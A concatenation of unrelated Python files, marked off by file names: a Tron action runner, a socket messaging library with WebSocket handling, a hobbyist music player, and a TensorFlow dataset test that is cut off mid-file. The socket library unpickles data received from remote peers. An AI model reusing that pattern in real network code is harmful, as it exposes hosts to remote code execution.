while(len( self.qued_batches ) ==0 ):
if (self.batch_que_length == 0):
#print "A"
self.prep_batches(break_loop=True)
else:
time.sleep(1)
b = self.qued_batches.pop(0)
log.info("Will process data %d to %d in batch." % (b[5], b[6]))
return b[0:5]
|
action_runner.py
|
#!/usr/bin/env python3.6
"""
Write pid and stdout/stderr to a standard location before execing a command.
"""
import argparse
import contextlib
import logging
import os
import subprocess
import sys
import threading
import time
from tron import yaml
STATUS_FILE = "status"
class StatusFile:
"""Manage a status file."""
def __init__(self, filename):
self.filename = filename
def get_content(self, run_id, command, proc):
return {
"run_id": run_id,
"command": command,
"pid": proc.pid,
"return_code": proc.returncode,
"runner_pid": os.getpid(),
"timestamp": time.time(),
}
@contextlib.contextmanager
def wrap(self, command, run_id, proc):
with open(self.filename, "w") as fh:
yaml.safe_dump(
self.get_content(run_id=run_id, command=command, proc=proc,), fh, explicit_start=True, width=1000000,
)
try:
yield
finally:
with open(self.filename, "a") as fh:
yaml.safe_dump(
self.get_content(run_id=run_id, command=command, proc=proc,),
fh,
explicit_start=True,
width=1000000,
)
def validate_output_dir(path):
if os.path.isdir(path):
if not os.access(path, os.W_OK):
raise OSError("Output dir %s not writable" % path)
return
else:
try:
os.makedirs(path)
except OSError:
raise OSError("Could not create output dir %s" % path)
def build_environment(run_id, original_env=None):
if original_env is None:
original_env = dict(os.environ)
try:
namespace, job, run_num, action = run_id.split(".", maxsplit=3)
except ValueError:
# if we can't parse the run_id, we don't want to abort, so just
# set these semi-arbitrarily
namespace, job, run_num, action = ["UNKNOWN"] * 4
new_env = dict(original_env)
new_env["TRON_JOB_NAMESPACE"] = namespace
new_env["TRON_JOB_NAME"] = job
new_env["TRON_RUN_NUM"] = run_num
new_env["TRON_ACTION"] = action
logging.debug(new_env)
return new_env
def run_proc(output_path, command, run_id, proc):
logging.warning(f"{run_id} running as pid {proc.pid}")
status_file = StatusFile(os.path.join(output_path, STATUS_FILE))
with status_file.wrap(
command=command, run_id=run_id, proc=proc,
):
returncode = proc.wait()
logging.warning(f"pid {proc.pid} exited with returncode {returncode}")
return returncode
def parse_args():
parser = argparse.ArgumentParser(description="Action Runner for Tron")
parser.add_argument(
"output_dir", help="The directory to store the state of the action run",
)
parser.add_argument(
"command", help="the command to run",
)
parser.add_argument(
"run_id", help="run_id of the action",
)
return parser.parse_args()
def run_command(command, run_id):
return subprocess.Popen(
command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=build_environment(run_id=run_id),
)
def stream(source, dst):
is_connected = True
logging.warning(f"streaming {source.name} to {dst.name}")
for line in iter(source.readline, b""):
if is_connected:
try:
dst.write(line.decode("utf-8"))
dst.flush()
logging.warning(f"{dst.name}: {line}")
except Exception as e:
logging.warning(f"failed writing to {dst}: {e}")
logging.warning(f"{dst.name}: {line}")
is_connected = False
else:
logging.warning(f"{dst.name}: {line}")
is_connected = False
def configure_logging(run_id, output_dir):
output_file = os.path.join(output_dir, f"{run_id}-{os.getpid()}.log")
logging.basicConfig(
filename=output_file, format="%(asctime)s %(levelname)s %(message)s", datefmt="%Y-%m-%dT%H:%M:%S%z",
)
def main():
args = parse_args()
validate_output_dir(args.output_dir)
configure_logging(run_id=args.run_id, output_dir=args.output_dir)
proc = run_command(command=args.command, run_id=args.run_id)
threads = [
threading.Thread(target=stream, args=p, daemon=True)
for p in [(proc.stdout, sys.stdout), (proc.stderr, sys.stderr)]
]
for t in threads:
t.start()
returncode = run_proc(output_path=args.output_dir, run_id=args.run_id, command=args.command, proc=proc,)
for t in threads:
t.join()
return returncode
if __name__ == "__main__":
sys.exit(main())
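# Hedged usage sketch (the output directory, command, and run id below are
# hypothetical):
#
#   python3.6 action_runner.py /var/tmp/tron_output "sleep 5 && echo done" my_ns.my_job.42.my_action
#
# The runner writes <output_dir>/status (two YAML documents, before and after
# the run), a <run_id>-<runner_pid>.log file, mirrors the child's stdout and
# stderr, and exits with the child's return code.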
|
__init__.py
|
import struct, socket, threading, json, os, pickle
from essentials import tokening
import essentials
import copy
import time
from hashlib import sha1
import base64
import array
PYTHONIC = "python based"
WEB_BASED = "web based"
def SocketDownload(sock, data, usage=None):
"""
Helper function for Socket Classes
"""
try:
payload_size = struct.calcsize(">L")
while len(data) < payload_size:
data += sock.recv(4096)
packed_msg_size = data[:payload_size]
data = data[payload_size:]
msg_size = struct.unpack(">L", packed_msg_size)[0]
while len(data) < msg_size:
data += sock.recv(4096)
frame_data = data[:msg_size]
data = data[msg_size:]
if usage is not None: usage.add(len(frame_data))
try:
xData = pickle.loads(frame_data, fix_imports=True, encoding="bytes")
return xData, data
except:
print("EOF Error Caught.")
except:
raise ConnectionError("Connection Error")
def SocketUpload(sock, data):
"""
Helper function for Socket Classes
"""
try:
data = pickle.dumps(data, 0)
size = len(data)
sock.sendall(struct.pack(">L", size) + data)
except:
raise ConnectionError("Connection Error")
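# Hedged sketch (not part of the public API): the wire format used by
# SocketUpload/SocketDownload is a 4-byte big-endian length prefix followed by
# a pickle (protocol 0) payload. A local socketpair is enough to show the
# round trip.
def _example_frame_roundtrip():
    a, b = socket.socketpair()
    try:
        SocketUpload(a, {"hello": "world"})
        payload, leftover = SocketDownload(b, b"", usage=Data_Storage())
    finally:
        a.close()
        b.close()
    return payload, leftover  # ({'hello': 'world'}, b'')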
def SocketUpload_WebBased(sock, data):
"""
Helper function for Socket Classes
"""
try:
if type(data) != type(b""):
print("WARNING: Web Sockets allow byte like data. Make sure your data is encoded next time.")
data.encode()
resp = bytearray([0b10000001, len(data)])
for d in bytearray(data):
resp.append(d)
sock.send(resp)
except Exception as e:
raise ConnectionError("Connection Error: " + str(e))
def HostServer(HOST, PORT, connections=5, SO_REUSEADDR=True):
"""
Helper function for Socket Classes
"""
PORT = int(os.getenv('PORT', PORT))
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
if SO_REUSEADDR == True:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind((HOST,PORT))
sock.listen(connections)
return sock
def ConnectorSocket(HOST, PORT):
"""
Helper function for Socket Classes
"""
clientsocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
clientsocket.connect((HOST, PORT))
return clientsocket
def WebSocket_Decode_Message(data):
"""
Helper function for Socket Classes
"""
data = bytearray(data)
if(len(data) < 6):
raise Exception("Error reading data")
assert(0x1 == (0xFF & data[0]) >> 7)
assert(0x1 == (0xF & data[0]))
assert(0x1 == (0xFF & data[1]) >> 7)
datalen = (0x7F & data[1])
if(datalen > 0):
mask_key = data[2:6]
masked_data = data[6:(6+datalen)]
unmasked_data = [masked_data[i] ^ mask_key[i%4] for i in range(len(masked_data))]
resp_data = bytearray(unmasked_data).decode("utf-8")
else:
resp_data = ""
return resp_data
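# Hedged sketch: build a masked text frame the way a browser client would, so
# WebSocket_Decode_Message() can be exercised without a real browser. Only
# payloads up to 125 bytes are covered, matching the decoder above.
def _example_masked_client_frame(text="hi"):
    payload = text.encode("utf-8")
    mask = os.urandom(4)
    frame = bytearray([0x81, 0x80 | len(payload)])  # FIN + text opcode, MASK bit + length
    frame += mask
    frame += bytes(b ^ mask[i % 4] for i, b in enumerate(payload))
    return WebSocket_Decode_Message(bytes(frame))  # -> original text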
class Transfer_Record(object):
def __init__(self):
self.sent = Data_Storage()
self.recieved = Data_Storage()
class Data_Storage(object):
def __init__(self):
self.bytes = 0
self.commits = 0
def add(self, count, type="b"):
self.bytes += count
self.commits += 1
@property
def megabytes(self):
return self.bytes * 0.000001
@property
def gigabyte(self):
return self.megabytes * 0.001
class Socket_Server_Host:
def __init__(self, HOST, PORT, on_connection_open, on_data_recv, on_question, on_connection_close=False, daemon=True, autorun=True, connections=5, SO_REUSEADDR=True, heart_beats=True, heart_beat_wait=20):
"""Host your own Socket server to allows connections to this computer.
Parameters
----------
HOST (:obj:`str`): Your hosting IP Address for this server.
PORT (:obj:`int`): Which port you'd like to host this server on.
on_connection_open (:obj:`def`): The function to call when you get a new connection. Gives Socket_Server_Client Class
on_data_recv (:obj:`def`): The function to call when you receive data from a connection.
on_question (:obj:`def`): The function to call when you receive a question from a connection.
on_connection_close (:obj:`def`, optional): The function to call when a connection is closed.
daemon (:obj:`bool`, optional): If you'd like the server to close when the python file closes or is interrupted.
autorun (:obj:`bool`, optional): Will run the server on init.
connections (:obj:`int`, optional): How many connections to allow at one time. To be used with autorun = True
Attributes
----------
running (:obj:`bool`): Is the server still running.
connections (:obj:`dict`): Holds all connection threads.
on_connection_open (:obj:`def`): Holds the function you specified to use; can be overwritten. NOTE: Overwriting this will not overwrite old connection values.
on_connection_close (:obj:`def`): Holds the function you specified to use; can be overwritten. NOTE: Overwriting this will not overwrite old connection values.
on_data_recv (:obj:`def`): Holds the function you specified to use; can be overwritten. NOTE: Overwriting this will not overwrite old connection values.
"""
self.on_connection_open = on_connection_open
self.on_connection_close = on_connection_close
self.on_data_recv = on_data_recv
self.HOST = HOST
self.PORT = PORT
self.heart_beats = heart_beats
self.heart_beat_wait = heart_beat_wait
self.connections = {}
self.on_question = on_question
self.running = False
if autorun:
self.Run(connections, daemon, SO_REUSEADDR)
@property
def connection_count(self):
return len(self.connections)
def Run(self, connections=5, daemon=True, SO_REUSEADDR=True):
"""
Will start the server on the specified host, port and listening count.
This setup allows you to shutdown, change, and restart the server.
Parameters
----------
connections (:obj:`int`): How many connections to accept at one time
:rtype: None
"""
self.server = HostServer(self.HOST, self.PORT, connections, SO_REUSEADDR)
self.running = True
self.broker = threading.Thread(target=self.ConnectionBroker, daemon=daemon)
self.broker.start()
def ConnectionBroker(self):
"""
Server background task for accepting connections, you'll not need to use this.
:rtype: None
"""
while self.running:
try:
conn, addr = self.server.accept()
if self.running == False:
conn.close()
return
conID = tokening.CreateToken(12, self.connections)
connector = Socket_Server_Client(conn, addr, conID, self.on_data_recv, on_question=self.on_question, on_close=self.close_connection, Heart_Beat=self.heart_beats, Heart_Beat_Wait=self.heart_beat_wait)
self.connections[conID] = connector
self.on_connection_open(connector)
time.sleep(0.05)
except Exception as e:
self.running = False
raise e
def close_connection(self, connection):
"""
Server background task for clearing connections and notifying the parent file, you'll not need to use this.
:rtype: None
"""
try:
self.on_connection_close(connection)
except:
pass
del self.connections[connection.conID]
def Shutdown(self):
"""
Shutdown the server and close all connections.
:rtype: None
"""
self.running = False
keys = list(self.connections.keys())
for con in keys:
try:
self.connections[con].shutdown()
except:
pass
self.connections = {}
try:
self.server.close()
except:
pass
def CloseConnection(self, conID):
"""
Shortcut to close a certain connection.
Can also be used as Server.connections[conID].shutdown()
:rtype: None
"""
self.connections[conID].shutdown()
class Socket_Server_Client:
def __init__(self, sock, addr, conID, on_data, on_question, on_close, Heart_Beat=True, Heart_Beat_Wait=20):
"""CLIENT for Socket_Server_Host"""
self.socket = sock
self.addr = addr
self.conID = conID
self.on_data = on_data
self.on_close = on_close
self.running = True
self.meta = {}
self.recv_data = b""
self.data_usage = Transfer_Record()
self.on_question = on_question
self.__ask_list__ = {}
self.created = essentials.TimeStamp()
self.heart_beat_wait = Heart_Beat_Wait
threading.Thread(target=self.__detect_client_type__, args=[Heart_Beat]).start()
def __detect_client_type__(self, Heart_Beat):
self.socket.settimeout(1)
while True:
try:
self.recv_data += self.socket.recv(1)
except:
break
if b"permessage-deflate" in self.recv_data:
self.client_type = WEB_BASED
GUID = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"
msg = self.recv_data.decode("utf-8")
vals = msg.replace("\r", "").split("\n")
headers = {}
for item in vals:
if item != "" and ":" in item:
headers[item.split(":")[0]] = item.split(": ")[1]
self.web_based_headers = headers
key = headers['Sec-WebSocket-Key']
sha1f = sha1()
sha1f.update(key.encode('utf-8') + GUID.encode('utf-8'))
response_key = base64.b64encode(sha1f.digest()).decode('utf-8')
websocket_answer = (
'HTTP/1.1 101 Switching Protocols',
'Upgrade: websocket',
'Connection: Upgrade',
'Sec-WebSocket-Accept: {key}\r\n\r\n',
)
response = '\r\n'.join(websocket_answer).format(key=response_key)
self.socket.send(response.encode('utf-8'))
else:
self.client_type = PYTHONIC
threading.Thread(target=self.__data_rev__, daemon=True).start()
if Heart_Beat == True and self.client_type == PYTHONIC:
self.socket.settimeout(None)
threading.Thread(target=self.__heart_beat__, daemon=True).start()
def __heart_beat__(self):
while self.running:
self.send({"heart_beat_function": True})
time.sleep(self.heart_beat_wait)
def shutdown(self):
"""
Shuts down this connection and removes any place it is still stored. Completes the on_close event.
:rtype: None
"""
try:
self.on_close(self)
except:
pass
self.running = False
try:
self.socket.shutdown(socket.SHUT_RDWR)
except:
pass
try:
self.socket.close()
except:
pass
def send(self, data):
"""
Send data to the remote connection.
:rtype: None
"""
if self.running == False:
raise ConnectionResetError("No Connection")
if self.client_type == PYTHONIC:
try:
SocketUpload(self.socket, data)
except:
self.shutdown()
elif self.client_type == WEB_BASED:
try:
SocketUpload_WebBased(self.socket, data)
except:
self.shutdown()
def ask(self, data, timeout=5):
if self.client_type == WEB_BASED:
print("WARNING: ask for Web Based Clients is not currently supported.")
return False
tok = essentials.CreateToken(20, self.__ask_list__)
self.__ask_list__[tok] = False
self.send({"function_ask_question": tok, "data": data})
while self.__ask_list__[tok] == False:
time.sleep(0.01)
timeout -= 0.01
if timeout <= 0:
raise TimeoutError("No response within time.")
copyed = copy.deepcopy(self.__ask_list__[tok])
del self.__ask_list__[tok]
return copyed['data']
def __data_rev__(self):
"""
Server background task for accepting data and running the on_data event; you'll not need to use this.
:rtype: None
"""
if self.client_type == PYTHONIC:
while self.running:
try:
data, temp = SocketDownload(self.socket, self.recv_data, self.data_usage.recieved)
self.recv_data = temp
except:
self.shutdown()
return
if type(data) == type({}) and 'heart_beat_function' in data:
pass
elif type(data) == type({}) and 'function_ask_response' in data:
self.__ask_list__[data['function_ask_response']] = data
elif type(data) == type({}) and 'function_ask_question' in data:
threading.Thread(target=self.on_question, args=[Socket_Question(data['data'], self, data['function_ask_question'])], daemon=True).start()
else:
threading.Thread(target=self.on_data, args=[data, self], daemon=True).start()
time.sleep(0.05)
elif self.client_type == WEB_BASED:
while self.running:
msg = b""
conti = True
while conti:
buffer = b""
while b"\n" not in buffer:
try:
buffer += self.socket.recv(1)
except:
conti = False
break
msg += buffer
if msg != b"":
self.data_usage.recieved.add(len(msg))
threading.Thread(target=self.on_data, args=[WebSocket_Decode_Message(msg), self], daemon=True).start()
class Socket_Question(object):
def __init__(self, data, client, tok):
self.data = data
self.questioner = client
self.__answer_token__ = tok
def answer(self, data):
self.questioner.send({"function_ask_response": self.__answer_token__, "data": data})
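# Hedged sketch: a minimal on_question handler. ask() on one side blocks until
# the other side calls Socket_Question.answer(), which routes the reply back to
# the matching token.
def _example_on_question(question):
    if question.data == "ping":
        question.answer("pong")
    else:
        question.answer({"echo": question.data})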
class Socket_Connector:
def __init__(self, HOST, PORT, on_data_recv, on_question, on_connection_close, Heart_Beat=True, Heart_Beat_Wait=10, legacy=False, legacy_buffer_size=1024):
"""Host your own Socket server to allows connections to this computer.
Parameters
----------
HOST (:obj:`str`): The hosting IP Address for the server.
PORT (:obj:`int`): The port the server is using.
on_data_recv (:obj:`def`): The function to call when you receive data from a connection.
on_question (:obj:`def`): The function to call when you receive Socket_Question from a connection.
on_connection_close (:obj:`def`, optional): The function to call when a connection is closed.
Attributes
----------
running (:obj:`bool`): Is the connection still running.
on_connection_close (:obj:`def`): Holds the function you specified to use; can be overwritten.
on_data_recv (:obj:`def`): Holds the function you specified to use; can be overwritten.
"""
self.running = True
self.HOST = HOST
self.legacy = legacy
self.legacy_buffer_size = legacy_buffer_size
self.PORT = PORT
self.recv_data = b""
self.__ask_list__ = {}
self.on_question = on_question
self.on_connection_close = on_connection_close
self.socket = ConnectorSocket(HOST, PORT)
self.on_data_recv = on_data_recv
threading.Thread(target=self.__data_rev__, daemon=True).start()
if Heart_Beat == True:
self.heart_beat_wait = Heart_Beat_Wait
threading.Thread(target=self.__heart_beat__, daemon=True).start()
def __heart_beat__(self):
while self.running:
self.send({"heart_beat_function": True})
time.sleep(self.heart_beat_wait)
def ask(self, data, timeout=5):
if self.legacy:
print("Can't ask questions to legacy connections")
return
tok = essentials.CreateToken(20, self.__ask_list__)
self.__ask_list__[tok] = False
self.send({"function_ask_question": tok, "data": data})
while self.__ask_list__[tok] == False:
time.sleep(0.01)
timeout -= 0.01
if timeout <= 0:
raise TimeoutError("No response within time.")
copyed = copy.deepcopy(self.__ask_list__[tok])
del self.__ask_list__[tok]
return copyed['data']
def send(self, data):
"""
Send data to the remote connection.
:rtype: None
"""
if self.running == False:
raise ConnectionResetError("No Connection")
try:
if self.legacy:
self.socket.sendall(data)
else:
SocketUpload(self.socket, data)
except Exception as e:
print(e)
self.shutdown()
def shutdown(self):
"""
Shuts down this connection. Completes the on_close event.
:rtype: None
"""
self.running = False
self.on_connection_close(self)
try:
self.socket.shutdown(socket.SHUT_RDWR)
except:
pass
try:
self.socket.close()
except:
pass
def __data_rev__(self):
"""
Client background task for accepting data and running the on_data event; you'll not need to use this.
:rtype: None
"""
while self.running:
if self.legacy:
self.on_data_recv(self.socket.recv(self.legacy_buffer_size))
else:
try:
data, temp = SocketDownload(self.socket, self.recv_data)
self.recv_data = temp
except:
self.shutdown()
return
if type(data) == type({}) and 'heart_beat_function' in data:
pass
elif type(data) == type({}) and 'function_ask_response' in data:
self.__ask_list__[data['function_ask_response']] = data
elif type(data) == type({}) and 'function_ask_question' in data:
self.on_question(Socket_Question(data['data'], self, data['function_ask_question']))
else:
self.on_data_recv(data)
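# Hedged end-to-end sketch (host, port, and helper names are hypothetical):
# wire a Socket_Server_Host and a Socket_Connector together on localhost and
# exchange one message. Callbacks run on daemon threads and client-type
# detection takes about a second, hence the sleep.
def _example_echo_session(port=5050):
    server_seen, client_seen = [], []

    def on_open(client):
        # client.send() is only safe once the client type has been detected,
        # so just note the connection here.
        pass

    def on_server_data(data, client):
        server_seen.append(data)
        client.send({"echo": data})

    def on_question(question):
        question.answer(question.data)

    server = Socket_Server_Host("127.0.0.1", port, on_open, on_server_data, on_question)
    conn = Socket_Connector("127.0.0.1", port, client_seen.append, on_question,
                            lambda c: None, Heart_Beat=False)
    conn.send({"hello": "server"})
    time.sleep(3)
    conn.shutdown()
    server.Shutdown()
    return server_seen, client_seen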
|
musicplayer.py
|
'''
musicplayer.py
Copyright (c) 2022 s1gnsgrfu
This software is released under the MIT License.
see https://github.com/s1gnsgrfu/MusicPlayer/blob/master/LICENSE
'''
#pydub,mutagen,pysimplegui,pytaglib
from pydub import AudioSegment
from pydub.utils import mediainfo
from pydub.playback import play
import simpleaudio
from mutagen.easyid3 import EasyID3
import taglib
import PySimpleGUI as sg
from io import BytesIO
from mutagen.id3 import ID3
from PIL import Image
import time
import re
import threading
import os
#import psutil
def plays():
global title,sud,ext,bit,st,th,plpa,art,cover_img,value,artpath
#bit = int(mediainfo(sud)['bit_rate'])
target='\\'
idx=sud[::-1].find(target)
ti=sud[-idx:]
target2='.'
idx2=ti.find(target2)
ext=ti[idx2+1:]
ti1=ti[:idx2]
sau = AudioSegment.from_file(sud, ext)
time1 = sau.duration_seconds
song = taglib.File(sud)
title=str(song.tags['TITLE'])
#title=dic['TITLE']
title=title.strip('[\'').strip('\']')
art=str(song.tags['ARTIST'])
art=art.strip('[\'').strip('\']')
tags = ID3(sud)
apic = tags.get("APIC:")
# artwork (cover image)
cover_img = Image.open(BytesIO(apic.data))
cover_img.save(f"C:\\Users\\s1gns\\Desktop\\Desktop\\Python\\musicplayer\\musicplayer\\art\\{art}_{title}.jpg")
artpath="C:\\Users\\s1gns\\Desktop\\Desktop\\Python\\musicplayer\\musicplayer\\art\\{art}_{title}.jpg"
#image_elem.update(source=f"art\\{art}_{title}.jpg")
#window['arrt'].update(f"art\\{art}_{title}.jpg")
#window.find_element('arrt').Update(source=f"art\\{art}_{title}.jpg")
#window.find_element('arrt').Update(f"art\\{art}_{title}.jpg")
#cover_img.show()
#print('Title:',title,'\tFormat:',ext,'\ttime:',round(time1),'sec','\tBitrate:',bit//1000,'Kbps\n')
print('Title:',title,'\tFormat:',ext,'\ttime:',round(time1),'sec\n')
simpleaudio.stop_all()
plpa='icon\\play.png'
thread5.start()
th=1
return
def pl():
global sud,ext,bit,plf,a,th,plpa
plpa='icon\\pause.png'
#sound=AudioSegment.from_file(sud,format=ext,bitrate=bit,stop=True)
sound=AudioSegment.from_file(sud,format=ext,stop=True)
a=play(sound)
st=2
plf=th=1
return
# st == 2 while playing
def stop():
simpleaudio.stop_all()
def info():
#print('Title:',ti1,'\tFormat:',ext,'\ttime:',round(time1),'sec','\tBitrate:',bit//1000,'Kbps','\tsamplerate:',slp,'Hz\n')
print('Title:',title,'\tFormat:',ext,'\ttime:',round(time),'sec')
#print('Title:',data[0],'\tFormat:',data[1],'\ttime:',round(data[2]),'sec','\tBitrate:',data[3]//1000,'Kbps\n')
return
def playing():
global plf
while True:
print('\rPlaying ',end='')
if plf==1:
p=0
break
time.sleep(1)
print('\rPlaying. ',end='')
if plf==1:
p=0
break
time.sleep(1)
print('\rPlaying.. ',end='')
if plf==1:
p=0
break
time.sleep(1)
print('\rPlaying...',end='')
if plf==1:
p=0
break
time.sleep(1)
return
def pref():
global mot
print('pref')
mot=[sg.Text('Preference',font=('Segoe UI Variable Small Light',20),pad=((40,0),(20,0)))],
[sg.Text('test01',font=('Segoe UI Variable Small Light',10),pad=((70,0),(50,0))),
sg.Radio('yes','pref1',key='radio01y',pad=((60,0),(50,0))),sg.Radio('no','pref1',key='radio01n',pad=((5,0),(50,0))),
sg.Button('Back',key='prefback',size=(10,1),pad=((700,0),(0,50)))]
window['most'].update('mot')
border=1
plf=st=i=th=c=cc=0
plpa='icon\\play.png'
#gsud=gext=gtitle='f'
a=cover_img=None
art=title=value='None'
#sud = 'music\\Preserved Roses.mp3'
sg.theme('DarkBlack')
# play/stop button = bb
#ftm=sg.Frame('',[[sg.Button(image_filename=plpa,key='bb',button_color=('#ffffff', '#000000'),border_width=border)]],size=(680,100),border_width=border)
ftm=sg.Frame('',[[sg.Button('Play',key='bb',button_color=('#ffffff', '#000000'),border_width=1,size=(6,3),pad=((300,0),(20,0)))]],size=(680,100),border_width=border)
#size 680,100
# song title / artist name display
ftl=sg.Frame('',[
[sg.Text('no title',key='tit',font=('Segoe UI Variable Small Light',15),pad=((30,0),(20,0)))],
[sg.Text(key='art',font=('Segoe UI Variable Small Light',9),pad=((30,0),(0,0)))]
],size=(200,100),border_width=border)
#size 300,100
# artwork display
fart=sg.Image('',filename='',key='arty',size=(100,100))
ftr=sg.Frame('',[[sg.Button ('b',key='b'),sg.Button ('t',key='cc')]],size=(300,100),border_width=border)
#size 300,100
# main area
defa=sg.Text('def',font=('Segoe UI Variable Small Light',40),pad=((30,0),(20,0)))
fmi=sg.Frame('',[],key='most',size=(1040,620),border_width=border)
'''
image_elem=sg.Image(source=f"art\\{art}_{title}.jpg",key='arrt')
fle=sg.Frame('',[
[image_elem]
],size=(230,620),border_width=border)'''
# left vertical panel
'''
fri=sg.Frame('',[
sg.Button('-',key='pref',size=(2,1))
],size=(250,620),border_width=border)'''
# this line raises an error
#fri=sg.Frame('',[],size=(250,620),border_width=border)
fri=sg.Frame('',[[
sg.Button('-',key='pref',size=(2,1))]
],size=(250,620),border_width=border)
'''
layout=[
[fle,fmi,fri],[ftl,ftm,ftr]
]'''
layout=[
[fri,fmi],[fart,ftl,ftm,ftr]
]
window=sg.Window('MusicPlayer',layout,resizable=True)
'''
thread1=threading.Thread(target=plays)
thread2=threading.Thread(target=info)
thread3=threading.Thread(target=playing)
thread5=threading.Thread(target=pl)'''
#print(song.tags)
#{'ALBUM': ['white forces'], 'ARTIST': ['fripSide'], 'COMMENT': ['Uploaded by Mashin'], 'DATE': ['2016'], 'GENRE': ['Anime'], 'TITLE': ['white forces'], 'TRACKNUMBER': ['1/4']}
while True:
event,values=window.read()
thread1=threading.Thread(target=plays)
thread2=threading.Thread(target=info)
thread3=threading.Thread(target=playing)
thread5=threading.Thread(target=pl)
if event is None:
print('exit')
break
#print(st)
if event=='bb':
if st==1:pass
else:
#thread4.start()
#i=0
if cc==0:
window['bb'].update('Pause')
#sud = 'music\\Preserved Roses.mp3'
sud = "C:\\Users\\s1gns\\Desktop\\Desktop\\Python\\musicplayer\\musicplayer\\music\\white forces.mp3"
cc+=1
print(cc)
elif cc==1:
stop()
cc+=1
print(cc)
elif cc==2:
window['bb'].update('Play')
#sud = 'music\\white forces.mp3'
#sud = 'music\\RAGE OF DUST.mp3'
sud = "C:\\Users\\s1gns\\Desktop\\Desktop\\Python\\musicplayer\\musicplayer\\music\\future gazer.flac"
cc+=1
print(cc)
elif cc==3:
stop()
cc=0
print(cc)
if cc%2==0:
print(cc)
pass
else:
print(cc)
plays()
window['tit'].update(title)
window['art'].update(art)
window['artpath'].update(fart)
if c==0:
window['bb'].update('Pause')
c=1
else:
window['bb'].update('Play')
c=0
#st=1
if event=='b':
print('pushed b')
if event=='cc':
if st==1:pass
else:
#thread4.start()
#i=1
sud = 'music\\white forces.mp3'
plays()
#data=set()
window['tit'].update(title)
if event=='pref':
pref()
if event=='prefback':
window['most'].update('defa')
print('backed')
#else:pass
window.close()
'''
def info():
print('Title:',ti1,'\tFormat:',ext,'\ttime:',round(time1),'sec','\tBitrate:',bit//1000,'Kbps\n')
def playing():
while True:
print('\rPlaying ',end='')
if plf==1:break
time.sleep(1)
print('\rPlaying. ',end='')
if plf==1:break
time.sleep(1)
print('\rPlaying.. ',end='')
if plf==1:break
time.sleep(1)
print('\rPlaying...',end='')
if plf==1:break
time.sleep(1)
#os.system('cls')
thread1=threading.Thread(target=plays)
thread2=threading.Thread(target=info)
thread3=threading.Thread(target=playing)
thread1.start()
thread2.start()
thread2.join()
thread3.start()
thread1.join()
plf=1
thread3.join()
print('\nBye')'''
'''
memo
b==b button
t==t button
bb==play/stop button
Watch out for escape sequences when putting paths into variables
Progress
To do
Display the image (artwork)
'''
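# Hedged sketch (paths are hypothetical): the inline artwork handling in plays()
# boils down to reading the ID3 APIC frame with mutagen and saving it with
# Pillow.
def _example_extract_artwork(mp3_path, out_path):
    tags = ID3(mp3_path)
    apic = tags.get("APIC:")
    if apic is None:
        return None  # no embedded cover art
    Image.open(BytesIO(apic.data)).save(out_path)
    return out_path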
|
map_dataset_op_test.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for the experimental input pipeline ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from collections import namedtuple
import os
import threading
import numpy as np
from tensorflow.contrib.data.python.kernel_tests import dataset_serialization_test_base
from tensorflow.contrib.data.python.ops import dataset_ops as contrib_dataset_ops
from tensorflow.contrib.data.python.ops import error_ops
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import function
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import functional_ops
from tensorflow.python.ops import io_ops
from tensorflow.python.ops import lookup_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import script_ops
from tensorflow.python.ops import sparse_ops
from tensorflow.python.ops import string_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.platform import test
from tensorflow.python.util import compat
class MapDatasetTest(test.TestCase):
def _buildMapDataset(self, components, count):
def _map_fn(x, y, z):
return math_ops.square(x), math_ops.square(y), math_ops.square(z)
return (
contrib_dataset_ops.Dataset.from_tensor_slices(components).map(_map_fn)
.repeat(count))
def testMapDataset(self):
"""Test an dataset that maps a TF function across its input elements."""
# The pipeline is TensorSliceDataset -> MapDataset(square_3) ->
# RepeatDataset(count).
components = (np.arange(7),
np.array([[1, 2, 3]]) * np.arange(7)[:, np.newaxis],
np.array(37.0) * np.arange(7))
count = array_ops.placeholder(dtypes.int64, shape=[])
dataset = self._buildMapDataset(components, count)
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
self.assertEqual([c.shape[1:] for c in components],
[t.shape for t in get_next])
with self.test_session() as sess:
# Test single-threaded access to the iterator.
sess.run(init_op, feed_dict={count: 14})
for _ in range(14):
for i in range(7):
result = sess.run(get_next)
for component, result_component in zip(components, result):
self.assertAllEqual(component[i]**2, result_component)
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
# Test multi-threaded access to the same iterator.
sess.run(init_op, feed_dict={count: 18})
results = []
def iterator_thread():
while True:
try:
results.append(sess.run(get_next))
except errors.OutOfRangeError:
return
threads = [self.checkedThread(target=iterator_thread) for _ in range(8)]
for t in threads:
t.start()
for t in threads:
t.join()
# `results` will contain the same elements components**2
# repeated 18 times, but in a non-deterministic order. Sort the
# results, and assert that each element of components**2 is
# produced 18 times.
results.sort(key=lambda x: x[0])
for i in range(7):
for j in range(18):
for component, result_component in zip(components,
results[i * 18 + j]):
self.assertAllEqual(component[i]**2, result_component)
def _buildParallelMapDataset(self, components, count, num_threads,
output_buffer_size):
def _map_fn(x, y, z):
return math_ops.square(x), math_ops.square(y), math_ops.square(z)
return (contrib_dataset_ops.Dataset.from_tensor_slices(components).map(
_map_fn, num_threads=num_threads, output_buffer_size=output_buffer_size)
.repeat(count))
def testParallelMapDataset(self):
